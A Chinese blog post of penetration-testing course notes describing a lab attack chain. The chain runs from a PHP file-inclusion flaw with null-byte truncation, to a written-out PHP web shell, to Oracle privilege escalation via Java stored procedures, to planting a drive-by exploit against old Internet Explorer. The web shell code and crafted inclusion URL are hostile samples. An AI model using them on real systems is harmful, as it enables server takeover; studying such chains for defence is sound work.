java 渗透_渗透课程笔记

由于仅仅是听课笔记,错漏均会有,原理是正确的

1.环境

主机1 192.168.0.101

1)win2003操作系统

2)开启apache+mysql+php+wordpress

其中 apache以低权限用户webmaster运行,使用端口80

wordpress暴露漏洞形式如下

XXX.php

$path_array = array(

"xxxpath" => "../../"

...

);

$postValue = $_POST;

$tmpArray = array_merge($path_array,$_POST);

include_once($tmpArray["xxxpath"]."YYY.php");

3)开启jboss+oracle

其中jboss以webmaster权限运行,使用端口1003

oracle以默认的system权限运行

4)防火墙开启,仅仅允许80,1003

主机2  192.168.0.102

1)win8 操作系统

2)ie低版本

3)脚本命令ie不断访问  192.168.0.101 首页

4)防火墙开启,仅仅允许80端口

攻击机 192.168.0.103

2.渗透过程

主机1

1)wordpress漏洞->apache web->low privilege

2)jboss->oracle->oracle dba->system privilege

主机2

3)apache web index.html->挂马->ie低版本漏洞->主机2

3.具体过程

1)上传cmd.txt文本,其内容为一个web shell形式如下

$contents ="<?php \n system($_REQUEST[\"cmd\"]); \n?>"; #记得不太清,大致是这个意思

file_put_contents("control.php",$contents); ###目的就是制作一个控制脚本到服务器上

?>

2)构造链接

XXX.php?xxxpath="xxx/cmd.txt%00"

从而使得

XXX.php中产生 include_once("xxx/cmd.txt%00"."YYY.php"); ##这导致%00后面的东西被截断,而cmd.txt被执行,从而生成control.php到服务器端

此时已取得webmaster的权限,可以用菜刀等软件直接操作webmaster的各项权限

3)由于有webmaster 权限,此时可以查看jboss链接oracle的账号密码,即可得到oracle的低级权限

4)通过oracle的尚未被去掉的提权接口,升级为oracle dba

5)将用户切换为oracle dba 此时可以书写 java 存储过程,此存储过程是system权限,此时实际已经得到系统的超级用户权限

6)可以书写java存储过程添加win2003系统管理员用户

7)在主机1的 index.php 中挂马,针对早期ie的缓冲区溢出

8)主机2访问index.php导致ie中的缓冲区溢出执行给定的下载木马并执行

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值